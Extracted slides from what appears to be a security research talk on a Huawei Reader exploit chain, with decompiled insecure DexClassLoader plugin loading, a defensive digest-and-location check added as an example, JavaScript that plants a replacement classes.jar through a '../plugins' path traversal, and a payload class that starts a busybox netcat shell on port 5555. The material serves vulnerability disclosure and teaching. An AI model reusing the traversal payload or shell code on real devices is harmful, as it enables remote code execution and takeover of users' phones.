    /sdcard/HWiReader/books/../plugins/DFService/classes.jar            (path passed to FILE.delete)
Huawei Reader – Insecure Plugin Loading
48
    public static Class loadPlug(Context arg4, String arg5, String arg6) throws Exception {
        // arg5 is a jar path on shared storage; nothing checks who wrote it.
        return new DexClassLoader(arg5, arg4.getApplicationInfo().dataDir, null,
                arg4.getClassLoader()).loadClass(arg6);
    }

    protected final ArrayList P() {
        if(pR == null) {
            try {
                PlatForm v3 = new PlatForm();
                Object v2 = Util.loadPlug(APP.getAppContext(),
                        v3.getPlugDir("DFService") + "classes.jar",
                        "com.zhangyue.iReader.PlugService.DocFeature").newInstance();
                v2.setPlatform(((IPlatform)v3));
                pR = ((IPlugDFService)v2);
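loadPlug hands whatever path getPlugDir returns to DexClassLoader without asking who wrote the file, which is why a classes.jar dropped there through the traversal becomes code running inside the app. The following is an added example, not the app's code, of the gate a defender would put in front of the class loader: the jar must live under the app-private directory, and its SHA-256 must match a digest pinned at build time. Class and method names, the temporary directories and the "plugin" bytes are constructed for illustration; the DexClassLoader call itself appears only as a comment because it needs the Android runtime.

```java
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

/**
 * Added example (not the vendor's code): gate plugin loading on where the jar
 * lives and on a pinned SHA-256 digest, so a file written to shared storage by
 * another process is never handed to DexClassLoader.
 */
public final class PluginGate {

    private static final char[] HEX = "0123456789abcdef".toCharArray();

    /** Hex-encoded SHA-256 of a file, streamed so large jars are not read into memory. */
    public static String sha256Hex(File f) throws IOException {
        MessageDigest md;
        try {
            md = MessageDigest.getInstance("SHA-256");
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e);
        }
        byte[] buf = new byte[8192];
        try (InputStream in = new FileInputStream(f)) {
            int n;
            while ((n = in.read(buf)) > 0) md.update(buf, 0, n);
        }
        byte[] d = md.digest();
        StringBuilder sb = new StringBuilder(d.length * 2);
        for (byte b : d) sb.append(HEX[(b >> 4) & 0xf]).append(HEX[b & 0xf]);
        return sb.toString();
    }

    /**
     * Returns the canonical jar path if (1) it lies inside the app-private
     * directory and (2) its SHA-256 equals the digest pinned at build time.
     * Only a path returned here should reach DexClassLoader.
     */
    public static File checkPlugin(File privateDir, File jar, String pinnedSha256Hex) throws IOException {
        String base = privateDir.getCanonicalPath() + File.separator;
        File canon = jar.getCanonicalFile();
        if (!canon.getPath().startsWith(base)) {
            throw new SecurityException("plugin outside app-private storage: " + canon);
        }
        byte[] actual = sha256Hex(canon).getBytes(StandardCharsets.US_ASCII);
        byte[] expected = pinnedSha256Hex.toLowerCase().getBytes(StandardCharsets.US_ASCII);
        if (!MessageDigest.isEqual(actual, expected)) {   // constant-time comparison
            throw new SecurityException("plugin digest mismatch for " + canon);
        }
        // On Android the caller would now do (not compiled here):
        // new DexClassLoader(canon.getPath(), ctx.getCodeCacheDir().getPath(), null,
        //                    ctx.getClassLoader()).loadClass(className);
        return canon;
    }

    // Desktop self-check with constructed "jar" bytes; the point is the
    // accept/refuse behaviour, not real dex loading.
    public static void main(String[] args) throws IOException {
        File privateDir = Files.createTempDirectory("app-private").toFile();
        File external = Files.createTempDirectory("sdcard").toFile();

        File good = new File(privateDir, "DFService/classes.jar");
        good.getParentFile().mkdirs();
        Files.write(good.toPath(), "constructed plugin bytes".getBytes(StandardCharsets.UTF_8));
        String pinned = sha256Hex(good);   // what the app would ship as a build-time constant

        File tampered = new File(privateDir, "DFService/classes-tampered.jar");
        Files.write(tampered.toPath(), "replaced plugin bytes".getBytes(StandardCharsets.UTF_8));

        File onSdcard = new File(external, "HWiReader/plugins/DFService/classes.jar");
        onSdcard.getParentFile().mkdirs();
        Files.copy(good.toPath(), onSdcard.toPath());

        for (File f : new File[] { good, tampered, onSdcard }) {
            try {
                System.out.println("LOAD   " + checkPlugin(privateDir, f, pinned));
            } catch (SecurityException e) {
                System.out.println("REFUSE " + e.getMessage());
            }
        }
    }
}
```

The location check matters as much as the digest: a jar under /sdcard can be rewritten by any process with storage access between the check and the load, so the file must be copied into app-private storage first and verified there. Of the three constructed cases, only the untouched jar in the private directory is loaded; the modified copy fails the digest and the identical copy on shared storage fails the location test.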
Huawei Reader – Insecure Plugin Loading
49
    function download_plugin() {
        document.writeln("++ Downloading replacement classes.jar ++");
        // It should be noted that FileId needs to be unique for the download to work correctly.
        var json = '{"Action":"onlineReader","Data":{' +
            '"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0},' +
            '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":' + PLUGIN_FILE_ID + ',' +
            '"FileName":"../plugins/DFService/classes.jar","FileSize":10000000,' +
            '"Ebk3DownloadUrl":"' + PLUGIN_URI + '","DownloadUrl":"' + PLUGIN_URI + '",' +
            '"Version":2}}}';
        window.ZhangYueJS.do_command(json);
    }
Huawei Reader – Payload Creation
50
    package com.zhangyue.iReader.PlugService;

    import android.util.Log;
    import java.io.IOException;

    // Replacement for the plugin class loaded by loadPlug; the constructor runs
    // as soon as newInstance() is called.
    public class DocFeature {
        public DocFeature() {
            // com.zhangyue.iReader.PlugService.DocFeature
            Log.e("ATTACKER", "RUNNING ARBITRARY CODE");
            String cmd = "/data/data/com.huawei.hwireader/busybox nc -l -p 5555 -e /data/data/com.huawei.hwireader/busybox sh";
            try {
                Runtime.getRuntime().exec(cmd);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
Demo
51
Questions
52
Credits
• Georgi Geshev, Rob Miller - https://labs.mwrinfosecurity.com/publications/logic-bug-hunting-in-chrome-on-android/new-blog-post
53
Whitepaper
54
• Full whitepaper can be found on the MWR Labs website (https://labs.mwrinfosecurity.com/publications/nhuawew-blog-post)
PUBLIC